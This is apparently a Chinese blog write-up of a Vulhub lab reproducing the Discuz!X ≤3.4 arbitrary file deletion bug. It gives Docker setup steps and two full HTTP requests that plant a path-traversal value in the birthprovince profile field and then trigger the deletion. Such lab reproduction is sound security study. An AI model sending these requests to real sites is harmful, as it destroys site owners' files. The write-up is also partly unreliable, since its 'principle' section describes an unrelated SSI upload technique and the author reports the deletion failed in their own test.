利用Vulnhub复现漏洞 - Discuz!X ≤3.4 任意文件删除漏洞
Discuz!X ≤3.4 任意文件删除漏洞
- Vulnhub官方复现教程
- 漏洞原理
- 复现漏洞
- 启动环境
- 漏洞复现
- Formhash
- Cookie
- 发送数据包
- 原文
Vulnhub官方复现教程
https://vulhub.org/#/environments/discuz/x3.4-arbitrary-file-deletion/
漏洞原理
在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用语法执行任意命令。
参考链接:
- https://httpd.apache.org/docs/2.4/howto/ssi.html
- https://www.w3.org/Jigsaw/Doc/User/SSI.html
复现漏洞
启动环境
https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为
cd /root/vulhub/discuz/x3.4-arbitrary-file-deletion
搭建及运行漏洞环境:
docker-compose build && docker-compose up -d
本次搭建环境略久哦!?
访问http://your-ip/install/来安装discuz,数据库地址填写db,其他保持默认即可:
一步到达:http://your-ip/install/index.php?step=3&install_ucenter=yes
漏洞复现
访问http://your-ip/robots.txt可见robots.txt是存在的:
注册用户http://your-ip/member.php?mod=register
在个人设置页面http://your-ip/home.php?mod=spacecp找到自己的formhash和Cookie
Formhash
右击选择查看元素orF12
搜索formhash,一般来说第二个就是我们要的值了,复制出来3ee271f5
Cookie
设置浏览器代理
通过BurpSuit拦截数据包,找到Cookie,复制
【注意】要复制全,到下一个字段位置
发送数据包
带上自己的Cookie、formhash发送如下数据包:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fextensions%2Fwebservices%2Ecfm; vv3_sid=1hJRz4; vv3_visitedfid=2; NY7_sid=J2ow6z; e1p_sid=x57H7z; PzlL_2132_saltkey=Gk2e7ZsJ; PzlL_2132_lastvisit=1561686597; PzlL_2132_ulastactivity=3285tPqd81cIiRoeYEyWJNghJ5aPE6Xynif3dFar3XaP4dhFDq6R; PzlL_2132_nofavfid=1; PzlL_2132_smile=1D1; JxMl_2132_saltkey=mstlA2ao; JxMl_2132_lastvisit=1561686868; JxMl_2132_sid=km296E; JxMl_2132_lastact=1561690519%09home.php%09spacecp; JxMl_2132_seccode=1.f498a97f650d5ece6b; JxMl_2132_ulastactivity=d332HbLFI1JPYWIYb%2B1nGX%2FyTTFfWpeCw73GpArP0s9lZ4mPfCi0; JxMl_2132_auth=8b60jSDfppWHWMLa9Lm93O6bwgTtY3K97hxp%2FBjoIwVchM9HVA6J1IBpMpFlrkZPOucMFSseiTG3cknzFFTb; JxMl_2132_nofavfid=1; JxMl_2132_noticeTitle=1
Connection: close
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"
3ee271f5
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"
../../../Discuz.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"
1
------WebKitFormBoundaryPFvXyxL45f34L12s--
提交成功之后,用户资料修改页面上的出生地就会显示成下图所示的状态:
说明我们的脏数据已经进入数据库了?
然后,新建一个upload.html,代码如下,将其中的[your-ip]改成discuz的域名,[form-hash]改成你的formhash:
用浏览器打开该页面,上传一个图片文件。
或直接构造HTTP包为
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=3ee271f5 HTTP/1.1
Host: 192.168.236.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fextensions%2Fwebservices%2Ecfm; vv3_sid=1hJRz4; vv3_visitedfid=2; NY7_sid=J2ow6z; e1p_sid=x57H7z; PzlL_2132_saltkey=Gk2e7ZsJ; PzlL_2132_lastvisit=1561686597; PzlL_2132_ulastactivity=3285tPqd81cIiRoeYEyWJNghJ5aPE6Xynif3dFar3XaP4dhFDq6R; PzlL_2132_nofavfid=1; PzlL_2132_smile=1D1; JxMl_2132_saltkey=mstlA2ao; JxMl_2132_lastvisit=1561686868; JxMl_2132_sid=km296E; JxMl_2132_lastact=1561692223%09home.php%09misc; JxMl_2132_seccode=1.f498a97f650d5ece6b; JxMl_2132_ulastactivity=d332HbLFI1JPYWIYb%2B1nGX%2FyTTFfWpeCw73GpArP0s9lZ4mPfCi0; JxMl_2132_auth=8b60jSDfppWHWMLa9Lm93O6bwgTtY3K97hxp%2FBjoIwVchM9HVA6J1IBpMpFlrkZPOucMFSseiTG3cknzFFTb; JxMl_2132_nofavfid=1; JxMl_2132_noticeTitle=1
Upgrade-Insecure-Requests: 1
-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg
随意
-----------------------------123821742118716--
fromhash和Cookie记得修改
成功实现了任意文件删除
原文
用浏览器打开该页面,上传一个正常图片。此时脏数据应该已被提取出,漏洞已经利用结束。
再次访问http://your-ip/robots.txt,发现文件成功被删除:
[外链图片转存失败(img-0ClEa6n2-1562319433735)(https://vulhub.org/vulhub/discuz/x3.4-arbitrary-file-deletion/6.png)]
但是根据我搜索其他文章,并且试图理解本次实验原理,应该是上传文件A,然后再上传一个图片文件B,由于B的存在,将A覆盖删除
不是很理解为什么http://your-ip/robots.txt会被删除,我自己的实验中,这个并没有被删除,还是可以访问